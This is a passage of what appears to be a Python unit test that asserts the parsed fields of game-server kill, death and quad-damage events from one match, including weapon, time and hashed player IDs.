assert e[16]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[16]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[16]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[16]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[16]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[16]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[16]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[16]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[16]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[16]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[16]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[16]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[16]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[16]['DATA']['MOD'] == 'ROCKET' # noqa
assert e[16]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[16]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[16]['DATA']['ROUND'] is None # noqa
assert e[16]['DATA']['SUICIDE'] is None # noqa
assert e[16]['DATA']['TEAMKILL'] is None # noqa
assert e[16]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[16]['DATA']['TEAM_DEAD'] is None # noqa
assert e[16]['DATA']['TIME'] == 55.6 # noqa
assert e[16]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[16]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[16]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[16]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[16]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[16]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[16]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[16]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[16]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[16]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[16]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[16]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[16]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[16]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[16]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[16]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[16]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[16]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[16]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[16]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[16]['DATA']['WARMUP'] == False # noqa
assert e[16]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[17]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[17]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[17]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[17]['DATA']['KILLER']['BOT'] is None # noqa
assert e[17]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[17]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[17]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[17]['DATA']['KILLER']['NAME'] is None # noqa
assert e[17]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[17]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[17]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[17]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[17]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[17]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[17]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[17]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[17]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[17]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[17]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[17]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[17]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[17]['DATA']['MOD'] == 'PLASMA' # noqa
assert e[17]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[17]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[17]['DATA']['ROUND'] is None # noqa
assert e[17]['DATA']['SUICIDE'] is None # noqa
assert e[17]['DATA']['TEAMKILL'] is None # noqa
assert e[17]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[17]['DATA']['TEAM_DEAD'] is None # noqa
assert e[17]['DATA']['TIME'] == 60.3 # noqa
assert e[17]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[17]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[17]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[17]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[17]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[17]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[17]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[17]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[17]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[17]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[17]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[17]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[17]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[17]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[17]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[17]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[17]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[17]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[17]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[17]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[17]['DATA']['WARMUP'] == False # noqa
assert e[17]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[18]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[18]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[18]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[18]['DATA']['KILLER']['BOT'] is None # noqa
assert e[18]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[18]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[18]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[18]['DATA']['KILLER']['NAME'] is None # noqa
assert e[18]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[18]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[18]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[18]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[18]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[18]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[18]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[18]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[18]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[18]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[18]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[18]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[18]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[18]['DATA']['MOD'] == 'PLASMA' # noqa
assert e[18]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[18]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[18]['DATA']['ROUND'] is None # noqa
assert e[18]['DATA']['SUICIDE'] is None # noqa
assert e[18]['DATA']['TEAMKILL'] is None # noqa
assert e[18]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[18]['DATA']['TEAM_DEAD'] is None # noqa
assert e[18]['DATA']['TIME'] == 60.3 # noqa
assert e[18]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[18]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[18]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[18]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[18]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[18]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[18]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[18]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[18]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[18]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[18]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[18]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[18]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[18]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[18]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[18]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[18]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[18]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[18]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[18]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[18]['DATA']['WARMUP'] == False # noqa
assert e[18]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[19]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[19]['DATA']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[19]['DATA']['TIME'] == 69.7 # noqa
assert e[19]['DATA']['WARMUP'] == False # noqa
assert e[19]['TYPE'] == 'PLAYER_QUAD' # noqa
assert e[20]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[20]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[20]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[20]['DATA']['KILLER']['BOT'] is None # noqa
assert e[20]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[20]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[20]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[20]['DATA']['KILLER']['NAME'] is None # noqa
assert e[20]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[20]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[20]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[20]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[20]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[20]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[20]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[20]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[20]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[20]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[20]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[20]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[20]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[20]['DATA']['MOD'] == 'LIGHTNING' # noqa
assert e[20]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[20]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[20]['DATA']['ROUND'] is None # noqa
assert e[20]['DATA']['SUICIDE'] is None # noqa
assert e[20]['DATA']['TEAMKILL'] is None # noqa
assert e[20]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[20]['DATA']['TEAM_DEAD'] is None # noqa
assert e[20]['DATA']['TIME'] == 72.3 # noqa
assert e[20]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[20]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[20]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[20]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[20]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[20]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[20]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[20]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[20]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[20]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[20]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[20]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[20]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[20]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[20]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[20]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[20]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[20]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[20]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[20]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[20]['DATA']['WARMUP'] == False # noqa
assert e[20]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[21]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[21]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[21]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[21]['DATA']['KILLER']['BOT'] is None # noqa
assert e[21]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[21]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[21]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[21]['DATA']['KILLER']['NAME'] is None # noqa
assert e[21]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[21]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[21]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[21]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[21]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[21]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[21]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[21]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[21]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[21]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[21]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[21]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[21]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[21]['DATA']['MOD'] == 'LIGHTNING' # noqa
assert e[21]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[21]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[21]['DATA']['ROUND'] is None # noqa
assert e[21]['DATA']['SUICIDE'] is None # noqa
assert e[21]['DATA']['TEAMKILL'] is None # noqa
assert e[21]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[21]['DATA']['TEAM_DEAD'] is None # noqa
assert e[21]['DATA']['TIME'] == 72.3 # noqa
assert e[21]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[21]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[21]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[21]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[21]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[21]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[21]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[21]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[21]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[21]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[21]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[21]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[21]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[21]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[21]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[21]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[21]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[21]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[21]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[21]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[21]['DATA']['WARMUP'] == False # noqa
assert e[21]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[22]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[22]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[22]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[22]['DATA']['KILLER']['BOT'] is None # noqa
assert e[22]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[22]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[22]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[22]['DATA']['KILLER']['NAME'] is None # noqa
assert e[22]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[22]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[22]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[22]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[22]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[22]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[22]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[22]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[22]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[22]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[22]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[22]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[22]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[22]['DATA']['MOD'] == 'LIGHTNING' # noqa
assert e[22]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[22]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[22]['DATA']['ROUND'] is None # noqa
assert e[22]['DATA']['SUICIDE'] is None # noqa
assert e[22]['DATA']['TEAMKILL'] is None # noqa
assert e[22]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[22]['DATA']['TEAM_DEAD'] is None # noqa
assert e[22]['DATA']['TIME'] == 74.1 # noqa
assert e[22]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[22]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[22]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[22]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[22]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[22]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[22]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[22]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[22]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[22]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[22]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[22]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[22]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[22]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[22]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[22]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[22]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[22]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[22]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[22]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[22]['DATA']['WARMUP'] == False # noqa
assert e[22]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[23]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[23]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[23]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[23]['DATA']['KILLER']['BOT'] is None # noqa
assert e[23]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[23]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[23]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[23]['DATA']['KILLER']['NAME'] is None # noqa
assert e[23]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[23]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[23]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[23]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[23]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[23]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[23]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[23]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[23]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[23]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[23]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[23]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[23]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[23]['DATA']['MOD'] == 'LIGHTNING' # noqa
assert e[23]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[23]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[23]['DATA']['ROUND'] is None # noqa
assert e[23]['DATA']['SUICIDE'] is None # noqa
assert e[23]['DATA']['TEAMKILL'] is None # noqa
assert e[23]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[23]['DATA']['TEAM_DEAD'] is None # noqa
assert e[23]['DATA']['TIME'] == 74.1 # noqa
assert e[23]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[23]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[23]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[23]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[23]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[23]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[23]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[23]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[23]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[23]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[23]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[23]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[23]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[23]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[23]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[23]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[23]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[23]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[23]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[23]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[23]['DATA']['WARMUP'] == False # noqa
assert e[23]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[24]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[24]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[24]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[24]['DATA']['KILLER']['BOT'] is None # noqa
assert e[24]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[24]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[24]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[24]['DATA']['KILLER']['NAME'] is None # noqa
assert e[24]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[24]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[24]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[24]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[24]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[24]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[24]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[24]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[24]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[24]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[24]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[24]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[24]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[24]['DATA']['MOD'] == 'LIGHTNING' # noqa
assert e[24]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[24]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[24]['DATA']['ROUND'] is None # noqa
assert e[24]['DATA']['SUICIDE'] is None # noqa
assert e[24]['DATA']['TEAMKILL'] is None # noqa
assert e[24]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[24]['DATA']['TEAM_DEAD'] is None # noqa
assert e[24]['DATA']['TIME'] == 77.4 # noqa
assert e[24]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[24]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[24]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[24]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[24]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[24]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[24]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[24]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[24]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[24]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[24]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[24]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[24]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[24]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[24]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[24]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[24]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[24]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[24]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[24]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[24]['DATA']['WARMUP'] == False # noqa
assert e[24]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[25]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[25]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[25]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[25]['DATA']['KILLER']['BOT'] is None # noqa
assert e[25]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[25]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[25]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[25]['DATA']['KILLER']['NAME'] is None # noqa
assert e[25]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[25]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[25]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[25]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[25]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[25]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[25]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[25]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[25]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[25]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[25]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[25]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[25]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[25]['DATA']['MOD'] == 'LIGHTNING' # noqa
assert e[25]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[25]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[25]['DATA']['ROUND'] is None # noqa
assert e[25]['DATA']['SUICIDE'] is None # noqa
assert e[25]['DATA']['TEAMKILL'] is None # noqa
assert e[25]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[25]['DATA']['TEAM_DEAD'] is None # noqa
assert e[25]['DATA']['TIME'] == 77.4 # noqa
